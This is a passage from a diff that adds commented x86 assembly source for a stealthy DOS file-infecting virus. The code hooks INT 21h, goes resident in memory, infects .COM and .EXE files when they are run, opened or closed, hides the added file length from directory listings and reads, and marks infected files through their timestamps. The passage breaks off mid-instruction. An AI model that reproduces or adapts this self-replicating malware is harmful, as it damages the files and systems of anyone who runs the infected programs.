+ mov si,ax + shl si,1 ; Shift w/zeros fill + shl si,1 ; Shift w/zeros fill + mov bx,[si] + mov es,[si+2] + pop si + pop ds + retn +sub_1 endp + +vir_1: mov cs:data_113,1600h ; (CS:135B=0) + mov cs:old_AX,ax ; (CS:12E3=0) + mov ah,30h + int 21h ; DOS Services ah=function 30h + ; get DOS version number ax + mov cs:dos_ver,al ; (CS:12EE=0) + mov cs:old_DS,ds ; (CS:1245=7DBDh) + mov ah,52h + int 21h ; DOS Services ah=function 52h + ; get DOS data table ptr es:bx + mov ax,es:[bx-2] + mov cs:data_68,ax ; (CS:1247=0) + mov es,ax + mov ax,es:[1] ; (5200:0001=0FFFFh) + mov cs:data_69,ax ; (CS:1249=0) + push cs + pop ds + mov al,1 + call sub_1 ; Get INT 01 vector + mov word ptr old_INT_1,bx ; (CS:1231=0) + mov word ptr old_INT_1+2,es ; (CS:1233=70h) + mov al,21h + call sub_1 ; Get INT 21 vector + mov word ptr old_INT,bx ; (CS:122D=0) + mov word ptr old_INT+2,es ; (CS:122F=70h) + mov byte ptr data_73,0 ; (CS:1250=0) + mov dx,offset debug + mov al,1 + call sub_27 ; Set INT 01 vector + pushf ; Push flags + pop ax + or ax,100h + push ax + in al,21h ; port 21h, 8259-1 int IMR + mov data_97,al ; (CS:12E5) + mov al,0FFh + out 21h,al ; port 21h, 8259-1 int comands + popf ; Pop flags + mov ah,52h + pushf ; Push flags + call dword ptr old_INT ; (CS:122D) + pushf ; Push flags + pop ax + and ax,0FEFFh + push ax + popf ; Pop flags + mov al,data_97 ; (CS:12E5=0) + out 21h,al ; port 21h, 8259-1 int comands + push ds + lds dx,old_INT_1 ; (CS:1231=0) Load 32 bit ptr + mov al,1 + call sub_27 ; Set INT 01 vector + pop ds + les di,old_INT ; (CS:122D=0) Load 32 bit ptr + mov word ptr ptr_INT_21,di ; (CS:1235=0) + mov word ptr ptr_INT_21+2,es ; (CS:1237=70h) + mov byte ptr data_70,0EAh ; (CS:124B=0) + mov data_71,offset INT_21 ; (CS:124C=0) (02CC) + mov data_72,cs ; (CS:124E=7DBDh) + call sub_18 ; (0DBA) + mov ax,4B00h + mov data_95,ah ; (CS:12E2=0) + mov dx,offset data_32 ; (CS:0021=0FEh) + push word ptr data_31 ; (CS:0020=0FE00h) + int 21h ; DOS Services ah=function 4Bh + ; run progm @ds:dx, parm @es:bx + pop word ptr data_31 ; (CS:0020=0FE00h) + add word ptr es:[di-4],9 + nop + mov es,old_DS ; (CS:1245) + mov ds,old_DS ; (CS:1245) + sub word ptr ds:[2],161h ; decrement mem size + mov bp,word ptr ds:[2] ; mem size + mov dx,ds + sub bp,dx + mov ah,4Ah + mov bx,0FFFFh + int 21h ; DOS Services ah=function 4Ah + ; change mem allocation, bx=siz + mov ah,4Ah + int 21h ; DOS Services ah=function 4Ah + ; change mem allocation, bx=siz + dec dx + mov ds,dx + cmp byte ptr ds:[MCB_0000],5Ah ; (7DBC:0000=0E9h) 'Z' + je loc_4 ; Jump if equal + dec cs:data_95 ; (CS:12E2=0) +loc_4: + cmp byte ptr cs:data_95,0 ; (CS:12E2=0) + je loc_5 ; Jump if equal + mov byte ptr ds:[MCB_0000],4Dh ; (7DBC:0000=0E9h) 'M' +loc_5: + mov ax,ds:MCB_0003 ; (7DBC:0003=1503h) + mov bx,ax + sub ax,161h + add dx,ax + mov ds:MCB_0003,ax ; (7DBC:0003=1503h) + inc dx + mov es,dx + mov byte ptr es:MCB_0000,5Ah ; (915F:0000=0) 'Z' + push cs:data_69 ; (CS:1249=0) + pop word ptr es:MCB_0001 ; (915F:0001=0) + mov word ptr es:MCB_0003,160h ; (915F:0003=0) + inc dx + mov es,dx + push cs + pop ds + mov cx,all_len/2 + mov si,all_len-2 ; (CS:15FE=0) + mov di,si + std ; Set direction flag + rep movsw ; Rep when cx >0 Mov [si] to es:[di] + cld ; Clear direction + push es + mov ax,offset loc_1EE + push ax + mov es,cs:old_DS ; (CS:1245=7DBDh) + mov ah,4Ah ; 'J' + mov bx,bp + int 21h ; DOS Services ah=function 4Ah + ; change mem allocation, bx=siz + retf ; Return far - jump to loc_1EE +loc_1EE: call sub_18 ; (0DBA) + mov cs:data_72,cs ; (CS:124E=7DBDh) + call sub_18 ; (0DBA) + push cs + pop ds + mov byte ptr data_76,14h ; (CS:12A2=0) + push cs + pop es + mov di,offset data_75 ; (CS:1252=0) + mov cx,14h + xor ax,ax ; Zero register + rep stosw ; Rep when cx >0 Store ax to es:[di] + mov data_103,al ; (CS:12EF=0) + mov ax,old_DS ; (CS:1245=7DBDh) + mov es,ax + lds dx,es:[0Ah] ; from offset 000A in PSP Load 32 bit ptr + mov ds,ax + add ax,10h + add word ptr cs:data_29+2,ax ; (CS:001A=1ED5h) + cmp byte ptr cs:data_31,0 ; (CS:0020=0) + jne loc_6 ; Jump if not equal +; restore infected .COM file and run it + sti ; Enable interrupts + mov ax,cs:data_23 ; (CS:0004=20CDh) + mov word ptr ds:[100h],ax ; (CS:0100=0E9Ah) + mov ax,cs:data_24 ; (CS:0006=340h) + mov word ptr ds:[102h],ax ; (CS:0102=589Ch) + mov ax,cs:data_25 ; (CS:0008=50C6h) + mov word ptr ds:[104h],ax ; (CS:0104=0Dh) + push cs:old_DS ; (CS:1245=7DBDh) + mov ax,100h + push ax + mov ax,cs:old_AX ; (CS:12E3=0) + retf ; Return far +loc_6: +; restore infected .EXE file and run it + add cs:data_27,ax ; (CS:0012=68Ch) + mov ax,cs:old_AX ; (CS:12E3=0) + mov ss,cs:data_27 ; (CS:0012=68Ch) + mov sp,cs:data_28 ; (CS:0014) original SP + sti ; Enable interrupts + jmp cs:data_29 ; (CS:0018=12Bh) +virus_entry: cmp sp,100h + ja loc_7 ; Jump if above + xor sp,sp ; Zero register +loc_7: + mov bp,ax + call sub_2 ; (0275) +sub_2: pop cx + sub cx,offset sub_2 + mov ax,cs + mov bx,10h + mul bx ; dx:ax = ax * 10 + add ax,cx ; cx = virus begin address + adc dx,0 + div bx ; ax,dx rem=dx:ax/10 + push ax ; ax = new segment + mov ax,offset vir_1 + push ax + mov ax,bp + retf ; Return far - jump to vir_1 + +table db 30h + dw offset _21_30 + db 23h + dw offset _21_23 + db 37h + dw offset _21_37 + db 4bh + dw offset _21_4B + db 3ch + dw offset _21_3C + db 3dh + dw offset _21_3D + db 3Eh + dw offset _21_3E + db 0Fh + dw offset _21_0F + db 14h + dw offset _21_14 + db 21h + dw offset _21_21 + db 27h + dw offset _21_27 + db 11h + dw offset _21_11_12 + db 12h + dw offset _21_11_12 + db 4Eh + dw offset _21_4E_4F + db 4Fh + dw offset _21_4E_4F + db 3Fh + dw offset _21_3F + db 40h + dw offset _21_40 + db 42h + dw offset _21_42 + db 57h + dw offset _21_57 + db 48h + dw offset _21_48 +end_tbl: +INT_21: cmp ax,4b00h + jnz loc_8_1 + mov cs:data_95,al +loc_8_1: push bp + mov bp,sp + push [bp+6] ; flags + pop cs:data_85 + pop bp ; ??? + push bp ; ??? + mov bp,sp + call sub_21 ; Save REGS in vir's stack + call sub_18 ; xchg info in INT 21 + call sub_15 ; BREAK = OFF + call sub_20 ; Restore regs from vir's stack + call sub_17 ; Save REGS + push bx + mov bx,offset table +loc_8: + cmp ah,cs:[bx] + jne loc_9 ; Jump if not equal + mov bx,cs:[bx+1] + xchg bx,[bp-14h] + cld ; Clear direction + retn +loc_9: + add bx,3 + cmp bx,offset end_tbl + jb loc_8 ; Jump if below + pop bx +loc_10: + call sub_16 ; Restore BREAK state + in al,21h ; port 21h, 8259-1 int IMR + mov cs:data_97,al ; (CS:12E5=0) + mov al,0FFh + out 21h,al ; port 21h, 8259-1 int comands + mov byte ptr cs:data_74,4 ; (CS:1251=0) + mov byte ptr cs:data_73,1 ; (CS:1250=0) + call sub_22 ; Set INT 01 for debuging + call sub_19 ; Restore REGS + push ax + mov ax,cs:data_85 ; (CS:12B3=0) + or ax,100h + push ax + popf ; Pop flags + pop ax + pop bp + jmp dword ptr cs:ptr_INT_21 ; (CS:1235=0) +loc_11: + call sub_21 ; Save REGS in vir's stack + call sub_16 ; (0D9B) + call sub_18 ; (0DBA) + call sub_20 ; Restore regs from vir's stack + pop bp + push bp + mov bp,sp + push cs:data_85 ; (CS:12B3=0) + pop word ptr [bp+6] + pop bp + iret ; Interrupt return +_21_11_12: call sub_19 ; Restore REGS + call sub_24 ; INT 21 + or al,al ; Zero ? + jnz loc_11 ; Jump if not zero + call sub_17 ; Save REGS + call sub_3 ; (0581) + mov al,0 + cmp byte ptr [bx],0FFh + jne loc_12 ; Jump if not equal + mov al,[bx+6] + add bx,7 +loc_12: + and cs:data_104,al ; (CS:12F0=0) + test byte ptr [bx+1Ah],80h + jz loc_13 ; Jump if zero + sub byte ptr [bx+1Ah],0C8h + cmp byte ptr cs:data_104,0 ; (CS:12F0=0) + jne loc_13 ; Jump if not equal + sub word ptr [bx+1Dh],1000h + sbb word ptr [bx+1Fh],0 +loc_13: + call sub_19 ; Restore REGS + jmp short loc_11 ; (033F) +_21_0F: call sub_19 ; Restore REGS + call sub_24 ; INT 21 + call sub_17 ; Save REGS + or al,al ; Zero ? + jnz loc_13 ; Jump if not zero + mov bx,dx + test byte ptr [bx+15h],80h + jz loc_13 ; Jump if zero + sub byte ptr [bx+15h],0C8h + sub word ptr [bx+10h],1000h + sbb byte ptr [bx+12h],0 + jmp short loc_13 ; (0396) +_21_27: jcxz loc_15 ; Jump if cx=0 +_21_21: mov bx,dx + mov si,[bx+21h] + or si,[bx+23h] + jnz loc_15 ; Jump if not zero + jmp short loc_14 ; (03D7) +_21_14: mov bx,dx + mov ax,[bx+0Ch] + or al,[bx+20h] + jnz loc_15 ; Jump if not zero +loc_14: + call sub_7 ; (0919) + jnc loc_16 ; Jump if carry=0 +loc_15: + jmp loc_10 ; (030F) +loc_16: + call sub_19 ; Restore REGS + call sub_17 ; Save REGS + call sub_24 ; INT 21 + mov [bp-4],ax + mov [bp-8],cx + push ds + push dx + call sub_3 ; (0581) + cmp word ptr [bx+14h],1 + je loc_17 ; Jump if equal + mov ax,[bx] + add ax,[bx+2] + add ax,[bx+4] + jz loc_17 ; Jump if zero + add sp,4 + jmp short loc_13 ; (0396) +loc_17: + pop dx + pop ds + mov si,dx + push cs + pop es + mov di,offset data_86 ; (CS:12B5=0) + mov cx,25h + rep movsb ; Rep when cx >0 Mov [si] to es:[di] + mov di,offset data_86 ; (CS:12B5=0) + push cs + pop ds + mov ax,[di+10h] + mov dx,[di+12h] + add ax,100Fh + adc dx,0 + and ax,0FFF0h + mov [di+10h],ax + mov [di+12h],dx + sub ax,0FFCh + sbb dx,0 + mov [di+21h],ax + mov [di+23h],dx + mov word ptr [di+0Eh],1 + mov cx,1Ch + mov dx,di + mov ah,27h ; ''' + call sub_24 ; INT 21 + jmp loc_13 ; (0396) +_21_23: push cs + pop es + mov si,dx + mov di,offset data_86 ; (CS:12B5=0) + mov cx,25h + rep movsb ; Rep when cx >0 Mov [si] to es:[di] + push ds + push dx + push cs + pop ds + mov dx,offset data_86 ; CS:12B5 + mov ah,0Fh + call sub_24 ; INT 21 + mov ah,10h + call sub_24 ; INT 21 + test byte ptr data_89,80h ; (CS:12CA=0) + pop si + pop ds + jz loc_20 ; Jump if zero + les bx,cs:data_88 ; (CS:12C5=0) Load 32 bit ptr + mov ax,es + sub bx,1000h + sbb ax,0 + xor dx,dx ; Zero register + mov cx,cs:data_87 ; (CS:12C3=0) + dec cx + add bx,cx + adc ax,0 + inc cx + div cx ; ax,dx rem=dx:ax/reg + mov [si+23h],ax + xchg ax,dx + xchg ax,bx + div cx ; ax,dx rem=dx:ax/reg + mov [si+21h],ax + jmp loc_13 ; (0396) +_21_4E_4F: and cs:data_85,0FFFEh ; (CS:12B3=0) + call sub_19 ; Restore REGS + call sub_24 ; INT 21 + call sub_17 ; Save REGS + jnc loc_18 ; Jump if carry=0 + or cs:data_85,1 ; (CS:12B3=0) + jmp loc_13 ; (0396) +loc_18: + call sub_3 ; (0581) + test byte ptr [bx+19h],80h + jnz loc_19 ; Jump if not zero + jmp loc_13 ; (0396) +loc_19: + sub word ptr [bx+1Ah],1000h + sbb word ptr [bx+1Ch],0 + sub byte ptr [bx+19h],0C8h + jmp loc_13 ; (0396) +_21_3C: push cx + and cx,7 + cmp cx,7 + je loc_23 ; Jump if equal + pop cx + call sub_13 ; (0CC6) + call sub_24 ; INT 21 + call sub_14 ; (0D6C) + pushf ; Push flags + cmp byte ptr cs:data_90,0 ; (CS:12DA=0) + je loc_21 ; Jump if equal + popf ; Pop flags +loc_20: + jmp loc_10 ; (030F) +loc_21: + popf ; Pop flags + jc loc_22 ; Jump if carry Set + mov bx,ax + mov ah,3Eh ; '>' + call sub_24 ; INT 21 + jmp short _21_3D ; (0511) +loc_22: + or byte ptr cs:data_85,1 ; (CS:12B3=0) + mov [bp-4],ax + jmp loc_13 ; (0396) +loc_23: + pop cx + jmp loc_10 ; (030F) +_21_3D: + call sub_9 ; Get PSP segment + call sub_8 ; (0925) + jc loc_26 ; Jump if carry Set + cmp byte ptr cs:data_76,0 ; (CS:12A2=0) + je loc_26 ; Jump if equal + call sub_10 ; (097E) + cmp bx,0FFFFh + je loc_26 ; Jump if equal + dec cs:data_76 ; (CS:12A2=0) + push cs + pop es + mov di,offset data_75 ; (CS:1252=0) + mov cx,14h + xor ax,ax ; Zero register + repne scasw ; Rep zf=0+cx >0 Scan es:[di] for ax + mov ax,cs:data_77 ; (CS:12A3=0) + mov es:[di-2],ax + mov es:[di+26h],bx + mov [bp-4],bx +loc_25: + and byte ptr cs:data_85,0FEh ; (CS:12B3=0) + jmp loc_13 ; (0396) +loc_26: + jmp loc_10 ; (030F) +_21_3E: push cs + pop es + call sub_9 ; Get PSP segment + mov di,offset data_75 ; (CS:1252=0) + mov cx,14h + mov ax,cs:data_77 ; (CS:12A3=0) +loc_27: + repne scasw ; Rep zf=0+cx >0 Scan es:[di] for ax + jnz loc_28 ; Jump if not zero + cmp bx,es:[di+26h] + jne loc_27 ; Jump if not equal + mov word ptr es:[di-2],0 + call sub_4 ; (0793) - infect file + inc cs:data_76 ; (CS:12A2=0) + jmp short loc_25 ; (0549) +loc_28: + jmp loc_10 ; (030F) + +; +; SUBROUTINE +; + +sub_3 proc near + push es + mov ah,2Fh ; '/' + call sub_24 ; INT 21 + push es + pop ds + pop es + retn +sub_3 endp + +_21_4B: or al,al ; Zero ? + jz loc_29 ; Jump if zero + jmp loc_36 ; (06E0) +loc_29: + push ds + push dx + mov cs:prm_blck_adr,bx ; (CS:1224) save EXEC block offset + mov word ptr cs:prm_blck_adr+2,es ; (CS:1226) save EXEC block segment + lds si,dword ptr cs:prm_blck_adr ; (CS:1224) Load EXEC block address + mov di,offset exec_block ; (CS:12F1) + mov cx,0Eh + push cs + pop es + rep movsb ; Save EXEC param block + pop si + pop ds + mov di,offset file_name ; (CS:1307) + mov cx,50h + rep movsb ; Save file name + mov bx,0FFFFh + call sub_23 ; (0E3A) + call sub_19 ; Restore REGS + pop bp + pop cs:data_98 ; (CS:12E6=0) + pop cs:data_99 ; (CS:12E8=0) + pop cs:data_85 ; (CS:12B3=0) + mov ax,4B01h + push cs + pop es + mov bx,offset exec_block + pushf ; Push flags + call dword ptr cs:ptr_INT_21 ; (CS:1235=0) + jnc loc_30 ; Jump if carry=0 + or cs:data_85,1 ; (CS:12B3=0) + push cs:data_85 ; (CS:12B3=0) + push cs:data_99 ; (CS:12E8=0) + push cs:data_98 ; (CS:12E6=0) + push bp + mov bp,sp + les bx,dword ptr cs:prm_blck_adr ; (CS:1224=0) Load 32 bit ptr + jmp loc_11 ; (033F) +loc_30: + call sub_9 ; Get PSP segment + push cs + pop es + mov di,offset data_75 ; (CS:1252=0) + mov cx,14h +loc_31: + mov ax,cs:data_77 ; (CS:12A3=0) + repne scasw ; Rep zf=0+cx >0 Scan es:[di] for ax + jnz loc_32 ; Jump if not zero + mov word ptr es:[di-2],0 + inc cs:data_76 ; (CS:12A2=0) + jmp short loc_31 ; (060B) +loc_32: + lds si,cs:entry_point ; (CS:1303=0) Load 32 bit ptr + cmp si,1 ; already infected? + jne loc_33 ; Jump if not equal + mov dx,word ptr ds:data_29+2 ; (0000:001A) - original entry point segment + add dx,10h + mov ah,51h + call sub_24 ; INT 21 - get PSP segment + add dx,bx + mov word ptr cs:entry_point+2,dx ; (CS:1305=0) + push word ptr ds:data_29 ; (0000:0018) - original entry point offset + pop word ptr cs:entry_point ; (CS:1303=0) + add bx,10h + add bx,ds:data_27 ; (0000:0012) - original SS: + mov cs:data_107,bx ; (CS:1301=0) + push word ptr ds:data_28 ; (0000:0014) - original SP + pop cs:data_106 ; (CS:12FF=0) + jmp short loc_34 ; (067F) +loc_33: + mov ax,[si] + add ax,[si+2] + add ax,[si+4] + jz loc_35 ; Jump if zero + push cs + pop ds + mov dx,offset file_name + call sub_8 ; (0925) + call sub_10 ; (097E) + inc cs:data_103 ; (CS:12EF=0) + call sub_4 ; infect file + dec cs:data_103 ; (CS:12EF=0) +loc_34: + mov ah,51h + call sub_24 ; INT 21 + call sub_21 ; Save REGS in vir's stack + call sub_16 ; (0D9B) + call sub_18 ; (0DBA) + call sub_20 ; Restore REGS from vir's stack + mov ds,bx + mov es,bx + push cs:data_85 ; (CS:12B3=0) + push cs:data_99 ; (CS:12E8=0) + push cs:data_98 ; (CS:12E6=0) + pop word ptr ds:PSP_0A ; offset 0A in PSP + pop word ptr ds:PSP_0A+2 ; offset 0C in PSP + push ds + lds dx,dword ptr ds:PSP_0A ; offset 0A in PSP - terminate address + mov al,22h + call sub_27 ; Set INT 22 vector + pop ds + popf ; Pop flags + pop ax + mov ss,cs:data_107 ; (CS:1301=0) + mov sp,cs:data_106 ; (CS:12FF=0) + jmp dword ptr cs:entry_point ; (CS:1303=0) +loc_35: + mov bx,[si+1] + mov ax,ds:[bx+si+sav_file] ; (0000:FD9F) + mov [si],ax + mov ax,ds:[bx+si+sav_file+2] ; (0000:FDA1) + mov [si+2],ax + mov ax,ds:[bx+si+sav_file+4] ; (0000:FDA3) + mov [si+4],ax + jmp short loc_34 ; (067F) +loc_36: + cmp al,1 + je loc_37 ; Jump if equal + jmp loc_10 ; (030F) +loc_37: + or cs:data_85,1 ; (CS:12B3=0) + mov cs:prm_blck_adr,bx ; (CS:1224=0) + mov word ptr cs:prm_blck_adr+2,es ; (CS:1226=7DBDh) + call sub_19 ; Restore REGS + call sub_24 ; INT 21 + call sub_17 ; Save REGS + les bx,dword ptr cs:prm_blck_adr ; (CS:1224) Load EXEC param block address + lds si,dword ptr es:[bx+12h] ; Load CS:IP from EXEC parameter block + jc loc_40 ; Jump if carry Set + and byte ptr cs:data_85,0FEh ; (CS:12B3=0) + cmp si,1 ; infected .EXE ? + je loc_38 ; Jump if equal + mov ax,[si] + add ax,[si+2] + add ax,[si+4] + jnz loc_39 ; Jump if not zero + mov bx,[si+1] + mov ax,ds:[bx+si+sav_file] ; (013B:FD9F) saved original file + mov [si],ax + mov ax,ds:[bx+si+sav_file+2] ; (013B:FDA1) saved original file + mov [si+2],ax + mov ax,ds:[bx+si+sav_file+4] ; (013B:FDA3) saved original file + mov [si+4],ax + jmp short loc_39 ; (0765) +loc_38: + mov dx,word ptr ds:data_29+2 ; (013B:001A=2E09h) + call sub_9 ; Get PSP segment + mov cx,cs:data_77 ; (CS:12A3) - PSP segment + add cx,10h + add dx,cx + mov es:[bx+14h],dx + mov ax,word ptr ds:data_29 ; (013B:0018=7332h) + mov es:[bx+12h],ax + mov ax,ds:data_27 ; (013B:0012=2E08h) + add ax,cx + mov es:[bx+10h],ax + mov ax,ds:data_28 ; (013B:0014=3E80h) + mov es:[bx+0Eh],ax +loc_39: + call sub_9 ; Get PSP segment + mov ds,cs:data_77 ; (CS:12A3=0) + mov ax,[bp+2] + mov ds:PSP_0A,ax ; (0000:000A=0F000h) + mov ax,[bp+4] + mov word ptr ds:PSP_0A+2,ax ; (0000:000C=7F6h) +loc_40: + jmp loc_13 ; (0396) +_21_30: mov byte ptr cs:data_104,0 ; (CS:12F0=0) + mov ah,2Ah + call sub_24 ; INT 21 + cmp dx,916h + jb loc_41 ; Jump if below + call sub_28 ; (0FB2) +loc_41: + jmp loc_10 ; (030F) + +; +; SUBROUTINE - INFECTION +; + +sub_4 proc near + call sub_13 ; (0CC6) + call sub_5 ; (0855) + mov byte ptr data_31,1 ; (CS:0020=0) + cmp data_38,5A4Dh ; (CS:1200=0) + je loc_42 ; Jump if equal + cmp data_38,4D5Ah ; (CS:1200=0) + je loc_42 ; Jump if equal + dec byte ptr data_31 ; (CS:0020=0) + jz loc_45 ; Jump if zero +loc_42: +; .EXE file infect + mov ax,data_41 ; (CS:1204=0) + shl cx,1 ; Shift w/zeros fill + mul cx ; dx:ax = reg * ax + add ax,200h + cmp ax,si + jb loc_44 ; Jump if below + mov ax,data_43 ; (CS:120A=0) + or ax,data_44 ; (CS:120C=0) + jz loc_44 ; Jump if zero + mov ax,data_80 ; (CS:12A9=0) + mov dx,data_81 ; (CS:12AB=0) + mov cx,200h + div cx ; ax,dx rem=dx:ax/reg + or dx,dx ; Zero ? + jz loc_43 ; Jump if zero + inc ax +loc_43: + mov data_41,ax ; (CS:1204=0) + mov data_40,dx ; (CS:1202=0) + cmp data_48,1 ; (CS:1214=0) + je loc_46 ; Jump if equal + mov data_48,1 ; (CS:1214=0) + mov ax,si + sub ax,data_42 ; (CS:1208=0) + mov data_49,ax ; (CS:1216=0) + add data_41,8 ; (CS:1204=0) + mov data_45,ax ; (CS:120E=0) + mov data_46,1000h ; (CS:1210=0) BUG BUG BUG!!! + ; When .EXE file is infected, + ; the end of the virus wil be + ; damaged. (sp = 1000) + call sub_6 ; (08B3) +loc_44: + jmp short loc_46 ; (084C) +loc_45: +; .COM file infect + cmp si,0F00h ; file len in paragraphs + jae loc_46 ; Jump if above or = + mov ax,data_38 ; (CS:1200=0) + mov data_23,ax ; (CS:0004=20CDh) + add dx,ax + mov ax,data_40 ; (CS:1202=0) + mov data_24,ax ; (CS:0006=340h) + add dx,ax + mov ax,data_41 ; (CS:1204=0) + mov data_25,ax ; (CS:0008=50C6h) + add dx,ax + jz loc_46 ; Jump if zero - allready infected + mov cl,0E9h + mov byte ptr data_38,cl ; (CS:1200=0) + mov ax,10h + mul si ; dx:ax = reg * ax + add ax,265h + mov word ptr data_38+1,ax ; (CS:1201=0) + mov ax,data_38 ; (CS:1200=0) + add ax,data_40 ; (CS:1202=0) + neg ax + mov data_41,ax ; (CS:1204=0) + call sub_6 ; (08B3) +loc_46: + mov ah,3Eh ; '>' + call sub_24 ; INT 21 + call sub_14 ; (0D6C) + retn +sub_4 endp + + +; +; SUBROUTINE +; + +sub_5 proc near + push cs + pop ds + mov ax,5700h + call sub_24 ; INT 21 + mov data_53,cx ; (CS:1229=0) + mov data_54,dx ; (CS:122B=0) + mov ax,4200h + xor cx,cx ; Zero register + mov dx,cx + call sub_24 ; INT 21 + mov ah,3Fh ; '?' + mov cl,1Ch + mov dx,1200h + call sub_24 ; INT 21 + mov ax,4200h + xor cx,cx ; Zero register + mov dx,cx + call sub_24 ; INT 21 + mov ah,3Fh ; '?' + mov cl,1Ch + mov dx,4 + call sub_24 ; INT 21 + mov ax,4202h + xor cx,cx ; Zero register + mov dx,cx + call sub_24 ; INT 21 + mov data_80,ax ; (CS:12A9=0) + mov data_81,dx ; (CS:12AB=0) + mov di,ax + add ax,0Fh + adc dx,0 + and ax,0FFF0h + sub di,ax + mov cx,10h + div cx ; ax,dx rem=dx:ax/reg + mov si,ax + retn +sub_5 endp + + +; +; SUBROUTINE +; + +sub_6 proc near + mov ax,4200h + xor cx,cx ; Zero register + mov dx,cx + call sub_24 ; INT 21 + mov ah,40h + mov cl,1Ch + mov dx,1200h + call sub_24 ; INT 21 + mov ax,10h + mul si ; dx:ax = reg * ax + mov cx,dx + mov dx,ax + mov ax,4200h + call sub_24 ; INT 21 + xor dx,dx ; Zero register + mov cx,1000h + add cx,di + mov ah,40h + call sub_24 ; INT 21 + mov ax,5701h + mov cx,data_53 ; (CS:1229=0) + mov dx,data_54 ; (CS:122B=0) + test dh,80h + jnz loc_47 ; Jump if not zero + add dh,0C8h +loc_47: call sub_24 ; INT 21 + cmp byte ptr dos_ver,3 ; (CS:12EE=0) + jb loc_ret_48 ; Jump if below + cmp byte ptr data_103,0 ; (CS:12EF=0) + je loc_ret_48 ; Jump if equal + push bx + mov dl,data_52 ; (CS:1228=0) + mov ah,32h + call sub_24 ; INT 21 + mov ax,cs:data_101 ; (CS:12EC=0) + mov [bx+1Eh],ax + pop bx +loc_ret_48: + retn +sub_6 endp + + +; +; SUBROUTINE +; + +sub_7 proc near + call sub_21 ; Save REGS in vir's stack + mov di,dx + add di,0Dh + push ds + pop es + jmp short loc_50 ; (0945) +sub_7 endp + + +; +; SUBROUTINE +; + +sub_8 proc near + call sub_21 ; Save REGS in vir's stack - save REGS + push ds + pop es + mov di,dx + mov cx,50h + xor ax,ax ; Zero register + mov bl,0 + cmp byte ptr [di+1],3Ah ; ':' + jne loc_49 ; Jump if not equal + mov bl,[di] + and bl,1Fh +loc_49: + mov cs:data_52,bl ; (CS:1228=0) + repne scasb ; Rep zf=0+cx >0 Scan es:[di] for al +loc_50: + mov ax,[di-3] + and ax,0DFDFh + add ah,al + mov al,[di-4] + and al,0DFh + add al,ah + mov byte ptr cs:data_31,0 ; (CS:0020=0) + cmp al,0DFh ; file name is ....COM + je loc_51 ; Jump if equal + inc byte ptr cs:data_31 ; (CS:0020=0) + cmp al,0E2h ; file name is ....EXE + jne loc_52 ; Jump if not equal +loc_51: + call sub_20 ; Restore regs from vir's stack + clc ; Clear carry flag + retn +loc_52: + call sub_20 ; Restore regs from vir's stack + stc ; Set carry flag + retn +sub_8 endp + + +; +; SUBROUTINE +; + +sub_9 proc near + push bx + mov ah,51h + call sub_24 ; INT 21 + mov cs:data_77,bx ; (CS:12A3=0) + pop bx + retn +sub_9 endp + + +; +; SUBROUTINE +; + +sub_10 proc near + call sub_13 ; (0CC6) + push dx + mov dl,cs:data_52 ; (CS:1228=0) + mov ah,36h ; '6' + call sub_24 ; INT 21 + mul cx ; dx:ax = reg * ax + mul bx ; dx:ax = reg * ax + mov bx,dx + pop dx + or bx,bx ; Zero ? + jnz loc_53 ; Jump if not zero + cmp ax,4000h + jb loc_54 ; Jump if below +loc_53: + mov ax,4300h + call sub_24 ; INT 21 + jc loc_54 ; Jump if carry Set + mov di,cx + xor cx,cx ; Zero register + mov ax,4301h + call sub_24 ; INT 21 + cmp byte ptr cs:data_90,0 ; (CS:12DA=0) + jne loc_54 ; Jump if not equal + mov ax,3D02h + call sub_24 ; INT 21 + jc loc_54 ; Jump if carry Set + mov bx,ax + mov cx,di + mov ax,4301h + call sub_24 ; INT 21 + push bx + mov dl,cs:data_52 ; (CS:1228=0) + mov ah,32h ; '2' + call sub_24 ; INT 21 + mov ax,[bx+1Eh] + mov cs:data_101,ax ; (CS:12EC=0) + pop bx + call sub_14 ; (0D6C) + retn +loc_54: + xor bx,bx ; Zero register + dec bx + call sub_14 ; (0D6C) + retn +sub_10 endp + + +; +; SUBROUTINE +; + +sub_11 proc near + push cx + push dx + push ax + mov ax,4400h + call sub_24 ; INT 21 + xor dl,80h + test dl,80h + jz loc_55 ; Jump if zero + mov ax,5700h + call sub_24 ; INT 21 + test dh,80h +loc_55: + pop ax + pop dx + pop cx + retn +sub_11 endp + + +; +; SUBROUTINE +; + +sub_12 proc near + call sub_21 ; Save REGS in vir's stack + mov ax,4201h + xor cx,cx ; Zero register + xor dx,dx ; Zero register + call sub_24 ; INT 21 + mov cs:data_78,ax ; (CS:12A5=0) + mov cs:data_79,dx ; (CS:12A7=0) + mov ax,4202h + xor cx,cx ; Zero register + xor dx,dx ; Zero register + call sub_24 ; INT 21 + mov cs:data_80,ax ; (CS:12A9=0) + mov cs:data_81,dx ; (CS:12AB=0) + mov ax,4200h + mov dx,cs:data_78 ; (CS:12A5=0) + mov cx,cs:data_79 ; (CS:12A7=0) + call sub_24 ; INT 21 + call sub_20 ; Restore regs from vir's stack + retn +sub_12 endp + +_21_57: or al,al ; Zero ? + jnz loc_58 ; Jump if not zero + and cs:data_85,0FFFEh ; (CS:12B3=0) + call sub_19 ; Restore REGS + call sub_24 ; INT 21 + jc loc_57 ; Jump if carry Set + test dh,80h + jz loc_56 ; Jump if zero + sub dh,0C8h +loc_56: + jmp loc_11 ; (033F) +loc_57: + or cs:data_85,1 ; (CS:12B3=0) + jmp loc_11 ; (033F) +loc_58: + cmp al,1 + jne loc_61 ; Jump if not equal + and cs:data_85,0FFFEh ; (CS:12B3=0) + test dh,80h + jz loc_59 ; Jump if zero + sub dh,0C8h +loc_59: + call sub_11 ; (09E6) + jz loc_60 ; Jump if zero + add dh,0C8h +loc_60: + call sub_24 ; INT 21 + mov [bp-4],ax + adc cs:data_85,0 ; (CS:12B3=0) + jmp loc_13 ; (0396) +_21_42: cmp al,2 + jne loc_61 ; Jump if not equal + call sub_11 ; (09E6) + jz loc_61 ; Jump if zero + sub word ptr [bp-0Ah],1000h + sbb word ptr [bp-8],0 +loc_61: + jmp loc_10 ; (030F) +_21_3F: and byte ptr cs:data_85,0FEh ; (CS:12B3=0) + call sub_11 ; (09E6) + jz loc_61 ; Jump if zero + mov cs:data_83,cx ; (CS:12AF=0) + mov cs:data_82,dx ; (CS:12AD=0) + mov cs:data_84,0 ; (CS:12B1=0) + call sub_12 ; (0A04) + mov ax,cs:data_80 ; (CS:12A9=0) + mov dx,cs:data_81 ; (CS:12AB=0) + sub ax,1000h + sbb dx,0 + sub ax,cs:data_78 ; (CS:12A5=0) + sbb dx,cs:data_79 ; 